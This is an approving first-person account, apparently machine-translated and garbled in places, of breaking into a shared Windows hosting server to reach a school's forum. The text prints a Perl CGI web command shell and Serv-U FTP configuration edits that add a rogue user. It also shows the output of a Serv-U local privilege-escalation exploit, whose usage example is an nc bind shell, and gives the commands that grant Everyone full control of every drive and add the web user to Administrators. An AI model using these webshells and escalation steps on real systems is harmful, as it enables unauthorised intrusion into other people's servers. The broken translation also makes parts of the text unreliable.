The techniques of this article are not the latest, and the technical content involved is not much, and it is important that the penetration thinking is. I finally graduated from high school, I must study hard in summer vacation, I have been studying, and the previous invasion is small. It is the study like this. The actual experience is too lacking, so I decided that the summer vacation will make up the infiltration technology, and you can look at the domestic The security of the host. Summer vacation has been studying a month of penetration in June, learns a lot of good ideas and experience from Xiaolu. Thank you, thank you. In more than a month, penetrate through hundreds of servers, independent, have a virtual host, group, domestic and foreign countries, I found an extremely serious problem, foreign server, universal security is very High, the administrator's security awareness is very high, be a proportion, if the average domestic average 10 servers can penetrate into 6 or more, the abroad, Taiwan, the average 10 servers can only penetrate 1. Of course, my level is also a problem. However, it reflects that the level of domestic administrators is indeed more than a few grades of foreign countries. The technical and consciousness of domestic administrators is urgently needed to increase significantly. However, there is also a BT administrator, I have met several servers. One of the Documents and Settings directories also have nsfocus directories. Is it the security of NSFOCUS? We didn't take this server, there is another, that is, today's focus. Once I saw a school forum (http://www.6***.com), it was very hot, and I was interested. Ping, I found that four bags returned to Request Timed out. Estimated is to do it. Strategy or firewall, like this kind of web security, naturally like to find a vulnerability from the site, since learning the web, I will fall a quirk, that is, if I can't find any vulnerabilities from the web, I would rather give up anything. Vulnerability scanner. Probably looked at the site. It is a forum, using Leadbbs, and other means, there are other ways, because I just visit this IP, return "NO Web Site IS Configured At this Address.", Initially judging is a virtual host, a few black stations Why is the success chance of madfold? Because there is http://whois.webhosting.info website, you can query how many domain names have been bound to IP. If it is a virtual host, this school forum has no vulnerability, does not mean other sites, soon, I passed a small company site (http://***.anyhost/) of DVBBS 6.0 Aspshell goes up, who knows only to operate your own directory. And your directory does not execute the programs, but also use NFSO, manually jump into the directory in the URL, and there is not much to browse, important program files and documents and settings directory can't see, from the information feedback from Aspshell. Look, each site has set a separate user, and it seems that everything is deadlocked.
There is no purpose jump catalog ... I habitually jumped to C: / PHP in URL, I didn't expect to see it, then this host will support PHP, immediately pass a phpspy Going up, very lucky, successfully saw the landing entrance, but I didn't expect to enter, PHP.INI set up an abnormal BT, the security mode was opened, and the PHPINFO function was also disabled. It could not see detailed system information, but read phpspy The self-contained probes can be found, allow_url_fopen, display_errors, register_globals is all disabled, the SYSTEM, PASSTHRU, EXEC, Shell_exec several functions are disabled, and the direct jump directory can only see these directories, each site The directory is similar to "D: /Webs/School.com" D: /Webs/School.com "," Diater, "Directory after each site directory is different, and you can't jump. Later I guess the back string is FTP password. I have tried it, I can't log in, it seems like Liu dark flower, I hope to break again ... Is it over? No, I tried FTP: Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp. C: / Documents and Settings / Administrator> FTP www. *****. ComConnected to www. School.com. 220 Welcome to FTP Server ... User (www. ***. com: (none): 331 User name Okay, Need Password. Password: 530 Not Logged in. login failed. ftp> bye 221 Goodbye ! Judging from the return information, we still have hope. Although he modified the Banner of FTP Server, from User Name Okay, Need Password. This is a bold judgment. This server is using Serv-U. I have to have all version of the EXPLOIT, if I have Can pass one, and be executed, everything is clear. Do you think about which directory can you write? At that time, I didn't find the sessionData directory in the C: / PHP directory, and it was not an automatic installation version. It is estimated that the administrator changed the session directory. Otherwise, this directory is written by everyone ... I originally Forgot a most important directory, c: / documents and settings / all users, you can know a lot of information from this directory, this directory is general, at least Everyone is readable, so we can know a lot of useful information, straight Turn to this directory through my aspshell manual, huh, huh. I saw a directory tree I wanted to see.
Application DatadocumentsDRMFavoritestesTemplates "Start" menu desktop is now trying to build a directory, but the directory inside includes the subdirectory, the BT administrator privilege is set to be strict, but we still have a harvest, that is, "c: / documents and settings / All Users / "start" menu / programs / "directory, see useful information on the results of many decisions, ActiveState ActivePerl 5.8Administrative ToolsDeerfield.comDTempIPSentryMBM 5NetMeterNetwork ICEPersits Software AspEmailPersits Software AspJpegServ-U FTP ServerSymantec Client SecurityWindows optimize the master boot manager WinRAR tool accessories Oh, now we know a lot of useful information, look at these things, you can see that the administrator is safe, efficient, installing Perl, that is, IPSentry can detect the website in real time. Class service, when a service is stopped, the software will play Pager, or email, or vocal, or run other software to remind the administrator to ensure that the server can process the server, indicating that the administrator is responsible, NetMeter can traffic network traffic Monitoring, installed black ice firewall and Norton anti-virus server version, indicating that the security of the administrator is very careful, this is still not counting, but also a firewall - VisNetic Firewall, is really BT home, install optimization Master, I saw this administrator or more love cleaning. From the management tool we also saw the terminal service client generator .lnk, terminal service configuration .lnk, and terminal service, this is good, maybe You can download more 3389 meat chicken. First download the SERV-U of the Serv-U through Aspshell, then view the target of the attribute, huh, the original SERV-U directory is "C: / Program Filesewfq4QRQTGY4635 / Serv-U /" , This is good, directly jump directory .oh ~, yes ~~, see it, immediately modify the servudaemon.ini file, this server actually put 280 users, fainted ... Whether, first Add [Domain1] Qi Qi: User281 = Angel | 1 | 0 Then add [USER = angel | 1] Password = ng98F85379EA68DBF97BAADCA99B69B805HomeDir = D: / websitesRelPaths = 1TimeOut = 600Maintenance = SystemAccess1 = D: / websites | RWAMELCDPSKEYValues = add an angel, the user password is 111111, with the highest authority to perform, and then we You can ftp to Quote Site Exec XXXXXXX, 嘻嘻 中 ... but the cruel reality smashed my plan again, and submit it after modifying the document, actually did not have a successful revision, it seems to be permission, authority rights Museum.
But there is hope, because we just saw the system installed black ice, some versions exist "ISS RealSecure / Blackice Protocol Analysis Module SMB Analysis Stack Overflow Vulnerability", can be used remotely, there is no compiler on hand, there is no way to compile code .
There is Perl, this is a big breakthrough, because the Perl directory generally wants ERVERYOED completely controlled, whether he uses ISAP or Perl.exe is usually writable, executable, download Perl shortcut to see the path , Huh, I saw it, I originally d: / user / bin is all the files in the bin directory stored in Perl, so that this directory may be written, or you may be executed, you will pass a Su.exe immediately (for all version of the current SERV-U local upgraded permission vulnerability), huh, huh, pass it, great, now it is implemented, just try to ask Aspshell, PHPSHELL can't, look at the last hope, find, find, finally I found a CGISHELL on my hard drive. I am old, the date of the file is June 30, 2002, the code is as follows: #! / Usr / bin / perlbinmode (stdout); Syswrite (stdout, "Content-Type: Text / HTML / R / N / R / N ", 27); $ _ = $ env {query_string}; s /% 20 / / ig; s /% 2fig; $ exECTHIS = $ _; syswrite (stdout,"
/ r / n ", 13); Open (stderr,"> & stdout ") || DIE" can't redirect stderr "; system ($ exECTHIS); syswrite (stdout," / r / n < / Html> / r / n ", 17); Close (stderr); close (stdout); exit; I have used the best CGISHELL, saved as a CGI file execution, halo ... I don't support it! A burst of depression, after 2 seconds depressed, think of there is also a hopes, that is, the PL, we haven't tried PL to expand, change the CGI file to the PL file, submit http: // Anyhost // cmd.pl?dir, my God! ! Display "Reject Access", can finally be executed! Too excited, immediately submitted: Return: Serv-U> 3.x local Exploit by xiaolu usage: serv-u.exe "Command" Example: serv-u.exe "nc.exe -l -p 99 -e cmd. Exe "Hey ~~ Now is IUSR permission, how is it? See you is still not dead this time? Submitted: http://anyhost//cmd.pl? D: /user/bin/su.exe "Cacls.exe C: / E / T / G Everyone: f" http: //anyhost/rmd.pl? D: /user/bin/su.exe "Cacls.exe D: / E / T / G Everyone: f" http://anyhost/ -cmd.pl? d: /user/bin/su.exe "CaCLS. Exe E: / E / T / G EVERYONE: F "Http: //anyhost/ -cmd.pl? d: /user/bin/su.exe "Cacls.exe f: / e / t / g everyone: f" returns the following information, it is successful! ! ! SERV-U> 3.x local Exploit by xiaolu <220 Serv-U FTP Server V5.2 for Winsock Ready ...> user local name okay, ned password. *********** ******************************************> Pass # l @ $ AK # @ P <230 user logged in, proceed. ************************************** ******************> Site maintenance *********************************** ************************** [ ] CREANG New Domain ... <200-domainid = 2 <220 Domain settings saved **** *********************************************************** [ ] Domain XL: 2 Created [ ] Creating Evil User <200-user = XL 200 User Settings Saved ************************************** **************************** [ ] Now Exploiting ...> user xl <331 user name okay, nesed password. ** *********************************************************** **> Pass 111111 <230 user logged in, proceed. ************************************************* **************** [ ] now Executing: Cacls.exe C: / E / T / G Everyone: F <220 Domain deleted ******** *********************************** ***************** Every time it is submitted once, because these commands take time to handle, it will set all partitions to Everyone completely controlled, Anything to operate the hard disk, but some commands are still limited, because the permissions have not improved, now we upgrade their users to administrators: http: //anyhost/ -cmd.pl? D: / user / bin / Su.exe "Net localGroup Administrators IUSR_Anyhost / Add" Now we pass the web way, the executed command is executed as the Administrator, I believe here, what should I do, everyone should know? I will find the directory of that school, go in ~~ The purpose is reached, I originally wanted to be a 3389 broiler, think about it, this BT administrator's site, I also take it for a long time.
